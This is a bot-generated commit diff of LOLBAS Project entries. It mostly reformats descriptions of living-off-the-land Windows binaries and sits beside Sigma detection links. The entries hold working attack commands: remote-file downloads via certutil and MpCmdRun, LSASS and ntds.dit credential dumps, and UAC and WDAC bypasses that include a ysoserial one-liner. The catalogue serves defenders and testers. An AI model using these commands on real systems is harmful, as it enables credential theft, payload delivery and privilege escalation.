Applying update LOLBAS-Project/LOLBAS@dcca4db

github-actions[bot] · github-actions[bot] · commit 3ae54088de9b · 2025-10-02T17:14:56.000Z
diff --git a/_lolbas/Binaries/Bitsadmin.md b/_lolbas/Binaries/Bitsadmin.md
@@ -35,8 +35,6 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\bitsadmin.exe
   - Path: C:\Windows\SysWOW64\bitsadmin.exe
-Code_Sample:
-  - Code:
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml
   - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml
diff --git a/_lolbas/Binaries/Certutil.md b/_lolbas/Binaries/Certutil.md
@@ -12,7 +12,7 @@ Commands:
     MitreID: T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
   - Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}
-    Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not.
+    Description: Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>` when not.
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
@@ -26,7 +26,7 @@ Commands:
     MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
   - Command: certutil.exe -URL {REMOTEURL:.exe}
-    Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash].
+    Description: Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>`.
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
diff --git a/_lolbas/Binaries/Cmdkey.md b/_lolbas/Binaries/Cmdkey.md
@@ -19,7 +19,4 @@ Detection:
 Resources:
   - Link: https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
   - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
-Acknowledgement:
-  - Person:
-    Handle:
 ---
diff --git a/_lolbas/Binaries/Eudcedit.md b/_lolbas/Binaries/Eudcedit.md
@@ -5,7 +5,7 @@ Author: Matan Bahar
 Created: 2025-08-07
 Commands:
   - Command: eudcedit
-    Description: Once executed, the Private Charecter Editor will be opened -  click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute.
+    Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute.
     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
     Category: UAC Bypass
     Privileges: Administrator
diff --git a/_lolbas/Binaries/Eventvwr.md b/_lolbas/Binaries/Eventvwr.md
@@ -5,7 +5,7 @@ Author: Jacob Gajek
 Created: 2018-11-01
 Commands:
   - Command: eventvwr.exe
-    Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
+    Description: During startup, eventvwr.exe checks the registry value `HKCU\Software\Classes\mscfile\shell\open\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
     Category: UAC Bypass
     Privileges: User
@@ -15,7 +15,7 @@ Commands:
       - Application: GUI
       - Execute: EXE
   - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
-    Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
+    Description: During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net
     Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
     Category: UAC Bypass
     Privileges: Administrator
diff --git a/_lolbas/Binaries/Iscsicpl.md b/_lolbas/Binaries/Iscsicpl.md
@@ -4,7 +4,7 @@ Description: Microsoft iSCSI Initiator Control Panel tool
 Author: Ekitji
 Created: 2025-08-17
 Commands:
-  - Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary
+  - Command: c:\windows\syswow64\iscsicpl.exe  # SysWOW64 binary
     Description: c:\windows\syswow64\iscsicpl.exe has a DLL injection through `C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll`, resulting in UAC bypass.
     Usecase: Execute a custom DLL via a trusted high-integrity process without a UAC prompt.
     Category: UAC Bypass
@@ -13,7 +13,7 @@ Commands:
     OperatingSystem: Windows 10, Windows 11
     Tags:
       - Execute: DLL
-  - Command: iscsicpl.exe # SysWOW64/System32 binary
+  - Command: iscsicpl.exe  # SysWOW64/System32 binary
     Description: Both `c:\windows\system32\iscsicpl.exe` and `c:\windows\system64\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command.
     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
     Category: UAC Bypass
@@ -24,8 +24,8 @@ Commands:
       - Execute: CMD
       - Application: GUI
 Full_Path:
-  - Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application
-  - Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application
+  - Path: c:\windows\system32\iscsicpl.exe  # UAC Bypass by breaking out from application
+  - Path: c:\windows\syswow64\iscsicpl.exe  # UAC Bypass by DLL injection and breakout from application
 Detection:
   - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml
   - IOC: C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll
diff --git a/_lolbas/Binaries/Ldifde.md b/_lolbas/Binaries/Ldifde.md
@@ -5,7 +5,7 @@ Author: Grzegorz Tworek
 Created: 2022-08-31
 Commands:
   - Command: Ldifde -i -f {PATH:.ldf}
-    Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder.
+    Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder.
     Usecase: Download file from Internet
     Category: Download
     Privileges: Administrator
diff --git a/_lolbas/Binaries/MpCmdRun.md b/_lolbas/Binaries/MpCmdRun.md
@@ -12,7 +12,7 @@ Commands:
     MitreID: T1105
     OperatingSystem: Windows 10
   - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe
-    Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
+    Description: Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.
     Usecase: Download file
     Category: Download
     Privileges: User
diff --git a/_lolbas/Binaries/OneDriveStandaloneUpdater.md b/_lolbas/Binaries/OneDriveStandaloneUpdater.md
@@ -5,7 +5,7 @@ Author: 'Elliot Killick'
 Created: 2021-08-22
 Commands:
   - Command: OneDriveStandaloneUpdater
-    Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
+    Description: Download a file from the web address specified in `HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`.
     Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
     Category: Download
     Privileges: User
diff --git a/_lolbas/Binaries/Rdrleakdiag.md b/_lolbas/Binaries/Rdrleakdiag.md
@@ -5,21 +5,21 @@ Author: 'John Dwyer'
 Created: 2022-05-18
 Commands:
   - Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
-    Description: Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
+    Description: Dump process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
     Usecase: Dump process by PID.
     Category: Dump
     Privileges: User
     MitreID: T1003
     OperatingSystem: Windows
   - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
-    Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
+    Description: Dump LSASS process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
     Usecase: Dump LSASS process.
     Category: Dump
     Privileges: Administrator
     MitreID: T1003.001
     OperatingSystem: Windows
   - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap
-    Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
+    Description: After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).
     Usecase: Dump LSASS process mutliple times.
     Category: Dump
     Privileges: Administrator
diff --git a/_lolbas/OtherMSBinaries/Dsdbutil.md b/_lolbas/OtherMSBinaries/Dsdbutil.md
@@ -15,7 +15,7 @@ Commands:
     OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
   - Command: dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
     Description: Mounting the snapshot with its GUID
-    Usecase: Mounting the snapshot to access the ntds.dit with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
+    Usecase: Mounting the snapshot to access the ntds.dit with `copy c:\<Snap Volume>\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`
     Category: Dump
     Privileges: Administrator
     MitreID: T1003.003
@@ -29,7 +29,7 @@ Commands:
     OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019
   - Command: dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
     Description: Mounting with snapshot identifier
-    Usecase: Mounting the snapshot identifier 1 and accessing it with with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
+    Usecase: Mounting the snapshot identifier 1 and accessing it with `copy c:\<Snap Volume>\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak`
     Category: Dump
     Privileges: Administrator
     MitreID: T1003.003
@@ -51,11 +51,6 @@ Detection:
   - IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
   - IOC: Event ID 4656
   - IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit
-  - Analysis:
-  - Sigma:
-  - Elastic:
-  - Splunk:
-  - BlockRule:
 Resources:
   - Link: https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358
   - Link: https://www.netwrix.com/ntds_dit_security_active_directory.html
diff --git a/_lolbas/OtherMSBinaries/VisualUiaVerifyNative.md b/_lolbas/OtherMSBinaries/VisualUiaVerifyNative.md
@@ -5,7 +5,7 @@ Author: Jimmy (@bohops)
 Created: 2021-09-26
 Commands:
   - Command: VisualUiaVerifyNative.exe
-    Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
+    Description: Generate Serialized gadget and save to - `C:\Users\%USERNAME%\AppData\Roaminguiverify.config` before executing.
     Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
     Category: AWL Bypass
     Privileges: User
